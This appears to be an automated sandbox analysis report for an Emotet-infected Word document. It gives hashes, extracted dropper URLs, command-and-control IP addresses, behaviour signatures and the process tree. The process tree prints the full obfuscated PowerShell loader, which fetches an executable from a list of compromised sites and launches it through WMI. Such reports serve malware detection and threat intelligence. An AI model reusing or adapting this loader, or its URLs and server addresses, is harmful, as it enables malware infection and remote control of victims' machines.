Analysis

  • max time kernel
    56s
  • max time network
    61s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    28-10-2020 17:46

General

  • Target

    emotet_e2_21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac_2020-10-28__174250968356._doc.doc

  • Size

    218KB

  • MD5

    8d7f667c5911d8e6c24bcbdbfe56b497

  • SHA1

    e13f9c603441f701c0ca9a53bb9b69eb5cb071a9

  • SHA256

    21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac

  • SHA512

    cc60e5138a4f1ff38329f30507a2840550758ca1bc0469f9c347ed735eb55b9af8ae69eb0dd646d4a22189e38812a6b386d66c7df3a25d3d770297556993b9e0

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.saintmarcel.com/wp-includes/VKbL2/

exe.dropper

https://gayatrienterprise.org/wp-admin/DPBsj/

exe.dropper

https://weparditestaa.fi/wp-admin/72uPk/

exe.dropper

https://blog.6b47.com/Assets/w5U/

exe.dropper

https://www.easeiseasy.com/wp-admin/q/

exe.dropper

https://ursuperstar.com/wp-admin/AAxKlbV/

exe.dropper

https://kramedas.lt/wp-admin/E9Gciyc/

exe.dropper

https://critical-thinking.fr/wp-includes/vHQWren/

Extracted

Family

emotet

Botnet

Epoch2

C2

80.227.52.78:80

51.89.199.141:8080

173.212.214.235:7080

167.114.153.111:8080

61.19.246.238:443

37.179.204.33:80

190.164.104.62:80

95.9.5.93:80

138.68.87.218:443

176.111.60.55:8080

194.190.67.75:80

66.76.12.94:8080

190.29.166.0:80

139.59.60.244:8080

184.180.181.202:80

49.50.209.131:80

24.133.106.23:80

121.7.31.214:80

185.94.252.104:443

50.91.114.38:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac_2020-10-28__174250968356._doc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:968
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD S e t - I T E M     v A r I A B l e : P V J U     (     [ t Y P E ] ( " { 3 } { 0 } { 1 } { 2 } "   - f   ' E M . ' , ' i o . D i r e ' , ' c T o r Y ' , ' S y s T ' ) )   ;     $ D T N m r =     [ T y P e ] ( " { 0 } { 3 } { 4 } { 2 } { 1 } { 5 } "   - F ' s y s t e M . n E t . S e R v I c e ' , ' a n ' , ' T m ' , ' p ' , ' o I n ' , ' a G e R ' )   ;   $ V w 6 1 v p u = ( ' B ' + ( ' 2 ' + ' h w 9 ' ) + ' 2 x ' ) ; $ E j 2 p 1 5 2 = $ A 3 a s 7 q a   +   [ c h a r ] ( 6 4 )   +   $ R d 9 l v x o ; $ O u v d _ a m = ( ' W ' + ( ' e 1 ' + ' _ ' ) + ( ' 3 ' + ' 3 p ' ) ) ;   (   g I     V a R I a b L e : p v j u   ) . V A l u e : : " C ` R E A t e d ` I r ` E C t O R y " ( $ H O M E   +   ( ( ( ' 7 ' + ' o P Q ' ) + ( ' q 5 4 ' + ' 1 0 ' + ' o 7 o P Y q ' ) + ' r t ' + ( ' h t 1 ' + ' 7 o ' ) + ' P ' )     - C r E P L A c e ( [ C H A R ] 5 5 + [ C H A R ] 1 1 1 + [ C H A R ] 8 0 ) , [ C H A R ] 9 2 ) ) ; $ U 5 s q t h k = ( ( ' P ' + ' e c ' ) + ( ' s r j ' + ' e ' ) ) ;   (     G e t - V a r I a b L e   D t n M R ) . v A L U E : : " s e C u r ` I T ` y P R O t o C O l "   =   ( ( ' T l ' + ' s ' ) + ' 1 2 ' ) ; $ I v c n f u z = ( ' L 3 ' + ' x 3 ' + ( ' 2 ' + ' a 0 ' ) ) ; $ M 3 z y 9 1 j   =   ( ' R 1 ' + ( ' s ' + ' 2 f ' ) + ' 0 ' + ( ' e m ' + ' k ' ) ) ; $ M 6 9 6 3 x a = ( ( ' Q ' + ' g 1 ' ) + ( ' b d ' + ' j ' ) + ' f ' ) ; $ Z 2 v t x v g = ( ( ' V 2 2 ' + ' n ' ) + ' k n ' + ' r ' ) ; $ T j m o 7 y f = $ H O M E + ( ( ( ' R ' + ' l e ' + ' Q q 5 ' ) + ( ' 4 1 ' + ' 0 ' ) + ' o R ' + ' l e ' + ( ' Y q ' + ' r t ' ) + ( ' h t 1 R ' + ' l ' ) + ' e ' ) . " R E P ` L ` A C e " ( ( ' R ' + ' l e ' ) , [ S T r I n g ] [ C h a r ] 9 2 ) ) + $ M 3 z y 9 1 j + ( ' . ' + ( ' e x ' + ' e ' ) ) ; $ C 8 c 6 d w a = ( ' T ' + ( ' q ' + ' n 3 ' ) + ( ' g ' + ' x x ' ) ) ; $ X 0 2 v b c n = . ( ' n e ' + ' w - ' + ' o b j e c t ' )   N E t . w e B C L i E N T ; $ A d 4 0 l 8 h = ( ( ( ( ' h t t p s ' + ' : ] [   1 ) ' + '   ' + ' j j k g ' + ' S   [ ]   ' + ' [ ] w ' + ' ] [   1 )   j j k g S ' + '   [ ' + ' ]   ' + ' [ ] w w w w ' + ' . s a i n ' ) ) + ( ( ' t m a r c ' + ' e l ' + ' . c o m ' + ' ] [   ' + ' 1 ' + ' )   ' + ' j ' + ' j ' + ' k g S   ' + ' [ ]   [ ] w w p - ' + ' i n c l u d e s ] [   1 )   ' + ' j j k g S   [ ]   [ ] ' + ' w ' + ' V K b L 2 ] [   1 )   j j k g ' + ' S   [ ' ) ) + ( ( ' ]   ' + ' [ ] ' + ' w @ h t ' + ' t p s ' + ' : ] [ ' + '   1 ' + ' ) ' + '   j j ' + ' k g S   [ ] ' + '   [ ' + ' ] w ] [ ' + '   1 ' + ' )   j j k g S   [ ]   ' + ' [ ] ' + ' w g a y a t r i e n t e r p r ' ) ) + ( ( ' i s e . o ' + ' r g ] [   1 )   j ' + ' j ' + ' k ' ) ) + ( ( ' g S   ' + ' [ ' + ' ]   [ ' + ' ] w w p ' + ' - a d m i n ] [   1 )   ' + ' j j k g S   ' + ' [ ]   [ ] w D P B s ' + ' j ] [   1 )   j j ' + ' k g S ' ) ) + ( '   [ ]   ' + ' [ ] w ' + ' @ h t ' ) + ( ( ' t p s ' + ' : ' + ' ] [ ' + '   ' + ' 1 )   j j k g ' + ' S   [ ]   [ ] ' + ' w ] [ ' + '   ' ) ) + ( ( ' 1 )   ' + ' j j k ' + ' g ' + ' S ' + '   ' + ' [ ] ' + '   [ ] w w e p ' + ' a ' + ' r d ' + ' i t e ' + ' s ' + ' t a a . f i ] [   1 ' + ' )   ' + ' j j k g S   [ ] ' + '   [ ] w ' ) ) + ( ( ' w ' + ' p - ' + ' a ' + ' d m i n ' + ' ] ' + ' [   ' + ' 1 ' + ' )   j j ' + ' k g S   [ ]   [ ] w 7 2 u ' ) ) + ( ( ' P k ] [   1 ' + ' ) ' + '   ' + ' j j k g S ' + '   [ ' + ' ]   ' + ' [ ] w @ ' + ' h t t p s ' + ' : ] ' + ' [   1 )   ' + ' j ' ) ) + ( ' j ' + ' k g S   ' ) + ( ( ' [ ' + ' ]   ' + ' [ ] w ' + ' ] [   1 ) ' + '   j j ' + ' k ' + ' g ' + ' S ' + '   [ ]   [ ] w b l o ' + ' g . 6 b 4 7 ' + ' . c o m ] [   ' + ' 1 ) ' ) ) + ( '   j j k ' + ' g S   ' + ' [ ]   [ ' + ' ] w A s s e t s ] [ ' ) + ( ( '   1 )   ' + ' j j ' + ' k ' + ' g ' + ' S   [ ]   [ ] w w 5 U ] [ ' + '   1 ' + ' )   j j k ' + ' g ' + ' S ' + '   [ ' + ' ] ' ) ) + ( '   ' + ' [ ] w @ ' ) + ( ' h t t ' + ' p ' ) + ( ( ' s ' + ' : ] ' + ' [   1 )   j j ' + ' k g S   [ ]   ' + ' [ ] w ] [   1 )   ' + ' j j ' + ' k g S   ' + ' [ ] ' + '   [ ] w ' + ' w w w . e a s e i s e ' ) ) + ( ( ' a ' + ' s y ' + ' . c o m ] [   1 )   j j k g ' + ' S   ' + ' [ ' + ' ] ' + '   [ ' + ' ] w w ' + ' p ' ) ) + ( ( ' - a d m i n ] [   1 )   j j ' + ' k g S   ' + ' [ ]   [ ] w q ] ' + ' [ ' + '   ' + ' 1 )   ' + ' j ' + ' j ' + ' k g ' + ' S ' + '   ' + ' [ ]   ' + ' [ ] w @ ' + ' h t ' + ' t ' + ' p s ' + ' : ' + ' ] [   1 ) ' + '   ' + ' j ' + ' j k g S   ' + ' [ ]   [ ] w ] [   1 ' + ' )   j j k g S   [ ] ' + '   [ ] w ' + ' u r ' + ' s u p e r s ' + ' t a r . ' + ' c ' ) ) + ( ( ' o m ] [ ' + '   1 )   ' + ' j j k ' ) ) + ( ' g ' + ' S   [ ]   [ ] w ' ) + ( ( ' w p - a ' + ' d m ' + ' i n ] [   1 )   j ' + ' j ' + ' k g ' + ' S ' + '   ' + ' [ ]   [ ] ' + ' w A A x ' + ' K l b V ] [ ' + '   1 ' + ' )   j j ' + ' k ' + ' g S   ' + ' [ ]   ' + ' [ ] w @ h ' + ' t t p s : ] [   1 ' + ' ) ' + '   j j k g S   ' ) ) + ( ( ' [ ' + ' ]   [ ] w ] [   1 )   j j k g ' + ' S ' + '   [ ] ' + '   [ ] ' ) ) + ( ( ' w k r a m ' + ' e d a s . l t ] [   1 ' + ' )   j j k g S   ' + ' [ ' + ' ]   ' + ' [ ] w w p - ' ) ) + ( ( ' a d m i n ] [ ' + '   1 )   j ' + ' j k g S   [ ]   [ ] ' + ' w E ' + ' 9 ' + ' G c ' + ' i y c ] [   1 )   j j k ' + ' g ' + ' S   [ ]   [ ] w @ h t t p s : ] [   1 ) ' + '   j j ' + ' k ' + ' g S   ' + ' [ ]   [ ' + ' ] w ] ' + ' [   1 )   ' + ' j ' + ' j k ' + ' g S   [ ]   [ ] w ' + ' c r i ' ) ) + ( ' t i c a l - t h ' + ' i n k i ' + ' n ' + ' g . ' ) + ( ( ' f ' + ' r ' + ' ] [   1 )   j j k g ' + ' S   [ ]   ' + ' [ ] w ' + ' w ' + ' p - ' ) ) + ' i ' + ( ( ' n c l u d e s ] [   ' + ' 1 ) ' + '   ' ) ) + ( ' j j ' + ' k g ' + ' S ' + '   [ ]   [ ] w ' ) + ( ( ' v H ' + ' Q ' + ' W r e n ] [   1 )   j j k g S   ' + ' [ ' + ' ]   [ ] w ' ) ) ) ) . " R E ` P L A ` C e " ( ( ( ( ' ] [   ' + ' 1 ' ) + ( ( ' )   ' ) ) + ( ' j j k ' + ' g S ' + '   [ ]   [ ' + ' ] ' ) + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x ' + ' w e ' ) ) [ 0 ] ) . " S ` p l I t " ( $ P y 0 n 3 3 v   +   $ E j 2 p 1 5 2   +   $ R 2 b a 7 x a ) ; $ S _ 9 g h l n = ( ( ' T ' + ' v 2 h ' ) + ' h ' + ' o a ' ) ; f o r e a c h   ( $ X c n u 3 a l   i n   $ A d 4 0 l 8 h ) { t r y { $ X 0 2 v b c n . " D O w n L O a D ` F ` i l e " ( $ X c n u 3 a l ,   $ T j m o 7 y f ) ; $ C s 2 x o e 0 = ( ( ' I f f n ' + ' u ' ) + ' _ d ' ) ; I f   ( ( . ( ' G ' + ' e ' + ' t - I t e m ' )   $ T j m o 7 y f ) . " L ` e n G ` T h "   - g e   3 2 4 4 3 )   { ( [ w m i c l a s s ] ( ( ' w i ' + ' n 3 ' ) + ( ' 2 ' + ' _ P ' ) + ' r o ' + ( ' c e ' + ' s s ' ) ) ) . " c R e a ` T E " ( $ T j m o 7 y f ) ; $ C c g z r b l = ( ( ' O ' + ' w g a o 1 ' ) + ' k ' ) ; b r e a k ; $ V 9 o 7 o 7 w = ( ( ' P 6 ' + ' c f a ' ) + ' 5 3 ' ) } } c a t c h { } } $ Q 3 e l 6 s x = ( ' L m ' + ' 5 s ' + ( ' 3 ' + ' m 9 ' ) ) 
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2940
  • C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
    C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Windows\SysWOW64\wlanutil\netbtugc.exe
      "C:\Windows\SysWOW64\wlanutil\netbtugc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:1912
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
    1⤵
      PID:2080
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
      1⤵
        PID:3868
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
        1⤵
        • Modifies data under HKEY_USERS
        PID:1044

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
        MD5

        517b184a3085056464d9a04dfd3d0703

        SHA1

        41fb7064c0b6626be4686b2a66fa8f7045f92602

        SHA256

        5fe16be3e44dd4f75b6dd1eac6f07ce9cfa8dc8f076803bd38b3603f0fa3abb8

        SHA512

        f41be27a2087f99a8c44d4840e7ae7bb1557ba8a0a6ffadec0a98c545f0ce296534c384e5248923d26ce1dec5d12acafb80d1d2004c84a2f5dc6f800365e0699

      • C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
        MD5

        517b184a3085056464d9a04dfd3d0703

        SHA1

        41fb7064c0b6626be4686b2a66fa8f7045f92602

        SHA256

        5fe16be3e44dd4f75b6dd1eac6f07ce9cfa8dc8f076803bd38b3603f0fa3abb8

        SHA512

        f41be27a2087f99a8c44d4840e7ae7bb1557ba8a0a6ffadec0a98c545f0ce296534c384e5248923d26ce1dec5d12acafb80d1d2004c84a2f5dc6f800365e0699

      • C:\Windows\SysWOW64\wlanutil\netbtugc.exe
        MD5

        517b184a3085056464d9a04dfd3d0703

        SHA1

        41fb7064c0b6626be4686b2a66fa8f7045f92602

        SHA256

        5fe16be3e44dd4f75b6dd1eac6f07ce9cfa8dc8f076803bd38b3603f0fa3abb8

        SHA512

        f41be27a2087f99a8c44d4840e7ae7bb1557ba8a0a6ffadec0a98c545f0ce296534c384e5248923d26ce1dec5d12acafb80d1d2004c84a2f5dc6f800365e0699

      • memory/968-4-0x000001D2A4FAB000-0x000001D2A4FB0000-memory.dmp
        Filesize

        20KB

      • memory/968-0-0x00007FFDFD2B0000-0x00007FFDFD8E7000-memory.dmp
        Filesize

        6.2MB

      • memory/1912-13-0x0000000000000000-mapping.dmp
      • memory/1912-15-0x00000000021C0000-0x0000000002203000-memory.dmp
        Filesize

        268KB

      • memory/1912-16-0x0000000002210000-0x0000000002252000-memory.dmp
        Filesize

        264KB

      • memory/2940-8-0x000001F02DDF0000-0x000001F02DDF1000-memory.dmp
        Filesize

        4KB

      • memory/2940-7-0x000001F02D8E0000-0x000001F02D8E1000-memory.dmp
        Filesize

        4KB

      • memory/2940-6-0x00007FFDF1740000-0x00007FFDF212C000-memory.dmp
        Filesize

        9.9MB

      • memory/3176-11-0x00000000022F0000-0x0000000002333000-memory.dmp
        Filesize

        268KB

      • memory/3176-12-0x0000000002340000-0x0000000002382000-memory.dmp
        Filesize

        264KB